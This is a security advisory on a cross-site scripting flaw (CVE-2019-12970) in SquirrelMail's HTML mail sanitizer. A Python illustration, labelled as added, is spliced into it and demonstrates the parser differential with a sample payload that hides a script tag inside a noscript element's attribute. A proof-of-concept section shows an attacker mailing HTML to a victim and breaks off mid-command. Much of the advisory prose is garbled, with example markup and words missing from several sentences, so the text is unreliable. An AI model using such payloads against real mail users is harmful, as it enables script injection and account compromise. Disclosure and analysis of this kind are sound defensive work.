Advisory ID: SYSS-2019-016
Manufacturer: The SquirrelMail Project
Affected Version(s): 1.4.22, SVN
Tested Version(s): SVN
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-04-17
Solution Date: N/A
Public Disclosure: 2019-07-01
CVE Reference: CVE-2019-12970
Author of Advisory: Moritz Bechler, SySS GmbH
SquirrelMail is an open-source webmail package.
The manufacturer describes the product as follows (see ):
"SquirrelMail is a standards-based webmail package written in PHP.
It includes built-in pure PHP support for the IMAP and SMTP protocols,
for maximum compatibility across browsers.
It has very few requirements and is very easy to configure and install.
SquirrelMail has all the functionality you would want from an email
client, including strong MIME support, address books, and folder
Due to insufficient HTML sanitization, SquirrelMail is vulnerable to
Cross-Site Scripting when viewing HTML mails.
When viewing e-mails in HTML mode (not active by default), SquirrelMail
applies a custom sanitization step in an effort to remove possibly
malicious script and other content from the viewed e-mail.
Due to improper handling of RCDATA and RAWTEXT type elements, the HTML
parser used in this process shows differences compared to real user
introduced which is not removed.
Due to the blacklisting nature of this mechanism, multiple such element
types are allowed and not correctly handled, including the elements
noembed, noframes, noscript and textarea.
When using a construction like
SquirrelMail's parser considers the included tag as part
of the title attribute and therefore does not sanitize its contents.
However, correctly parsing this, the element ends at the
first closing tag and the tag is actual content.
This allows having otherwise forbidden elements and attributes,
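The parser differential described above, as an added illustration that is not part of the advisory or of SquirrelMail's code: a toy tokenizer run once in a naive mode (quoted attribute values are honoured even inside a raw-text element, as the flawed sanitizer does) and once browser-style (a RAWTEXT/RCDATA element ends at the first matching close tag), over a constructed sample following the advisory's construction; the blocklist, the element set and the sample are assumptions for the demonstration.

```python
import re

# Elements whose content browsers parse as RAWTEXT/RCDATA: up to the first
# matching close tag everything is text, never markup (noscript only when
# scripting is enabled). Naive mode ignores this, like the flawed parser.
RAW_TEXT_ELEMENTS = {"script", "style", "xmp", "iframe", "noembed", "noframes",
                     "noscript", "textarea", "title"}
FORBIDDEN = {"script"}  # blocklist of this toy sanitizer (constructed)

# A tag with optional attributes; quoted attribute values may contain '>'.
TAG_RE = re.compile(
    r"<(/?)([a-zA-Z][a-zA-Z0-9]*)"
    r"((?:\s+[^\s=>\"'/]+(?:\s*=\s*(?:\"[^\"]*\"|'[^']*'|[^\s>]+))?)*)\s*/?>")

def tokenize(html, rawtext_aware):
    """Return ('text', data) and ('tag', name, is_close, raw) tokens."""
    tokens, pos = [], 0
    while pos < len(html):
        m = TAG_RE.search(html, pos)
        if not m:
            tokens.append(("text", html[pos:]))
            break
        if m.start() > pos:
            tokens.append(("text", html[pos:m.start()]))
        is_close, name = m.group(1) == "/", m.group(2).lower()
        tokens.append(("tag", name, is_close, m.group(0)))
        pos = m.end()
        if rawtext_aware and not is_close and name in RAW_TEXT_ELEMENTS:
            # Browser behaviour: everything up to </name> is plain text.
            end = re.compile(rf"</{name}\s*>", re.I).search(html, pos)
            stop = end.start() if end else len(html)
            tokens.append(("text", html[pos:stop]))
            pos = stop
    return tokens

def forbidden_tags(html, rawtext_aware):
    """Names of blocklisted tags the tokenizer sees in the given mode."""
    return [t[1] for t in tokenize(html, rawtext_aware)
            if t[0] == "tag" and t[1] in FORBIDDEN]

def sanitize(html):
    """Drop forbidden tags and the raw text they enclose, browser-style."""
    out, skip = [], False
    for t in tokenize(html, rawtext_aware=True):
        if t[0] == "tag" and t[1] in FORBIDDEN:
            skip = not t[2]  # skip text after an opener, resume at the closer
            continue
        if not skip:
            out.append(t[1] if t[0] == "text" else t[3])
    return "".join(out)

# Constructed sample following the advisory's construction: a raw-text
# element whose nested tag hides a close tag plus markup in a title attribute.
SAMPLE = '<noscript><p title="</noscript><script>x()</script>">hi</p>'
```

In naive mode the sample contains no forbidden tag at all, so a blocklist sanitizer passes it untouched; in browser mode the script element is real content and is removed.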
Proof of Concept (PoC):
Send an HTML email to a victim user:
attacker> mail -a "Content-type: text/html" -s "My little pony" \